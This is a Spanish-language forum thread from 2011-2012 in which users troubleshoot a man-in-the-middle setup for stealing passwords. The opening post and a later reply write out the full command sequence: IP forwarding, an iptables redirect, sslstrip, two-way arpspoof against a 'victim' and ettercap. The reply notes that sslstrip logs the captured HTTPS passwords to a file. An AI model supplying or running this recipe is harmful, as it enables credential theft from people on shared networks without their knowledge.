Título: Internet se desconecta luego de usar ettercap Publicado por: scardenasz en 27 Diciembre 2011, 06:01 am Mostraré los pasos que hago para poder sacar contraseñas protegidas por SSL, y el momento en el que se me desconecta internet (Luego tengo que reiniciar el pc, puesto que no vuelve a conectarse mas).
1) Pongo la maquina en modo ip_fordward = 1 Código: echo "1" > /proc/sys/net/ipv4/ip_forward 2) Redireccion el trafico http del puerto 80 al 1000 con iptables Código: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000 3)Corro sslstrip en el puerto 1000 Código: sslstrip.py -l 1000 4)Corro arpspoof Código: arpspoof -i interface -t iptarget iprouter 5)Corro ettercap Código: ettercap -Tqz -u -i interface Este procedimiento lo hice en 2 lugares distintos, en uno conectados con un Router D-link DI-524. Tuve el problema de que la victima se caía continuamente. En el otro conectados con un modem inalambrico motorola SBG900, sin embargo en este apenas empiezo a correr ettercap, se me cae a mi el internet. Datos importantes: trabajo en debian 6, 2.6.32-5-686. mi tarjeta de red es una Broadcom BCM4312. nota 2 = no uso la tarjeta en modo monitor, ya que veo que en ocasiones mucho mejor en modo managed. Muchas gracias Título: Re: Internet se desconecta luego de usar ettercap Publicado por: alpha015 en 2 Enero 2012, 00:25 am Te recomiendo que uses Wireshark:
http://cert.inteco.es/cert/Notas_Actualidad/informe_sobre_analisis_trafico_wireshark_20110211?postAction=getLatestInfo Saludos. Título: Re: Internet se desconecta luego de usar ettercap Publicado por: H1tchclock en 14 Enero 2012, 23:10 pm Te recomiendo que uses Wireshark: Wireshark Ettercap...... ;-) Título: Re: Internet se desconecta luego de usar ettercap Publicado por: darkvidhack en 21 Enero 2012, 17:37 pm Hola!! en teoría, poniendo a 1 el ip_forward, no debería darte problemas, aún así, yo hago lo siguiente:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000 arpspoof -i interface -t iptarget iprouter arpspoof -i interface -t iprouter iptarget sslstrip -w fichero.txt Si solo quieres passwords del protocolo https (protocolo SsL), no te hace falta ettercap, el mismo sslstrip te las almacena en 'fichero.txt' Saludos ;) |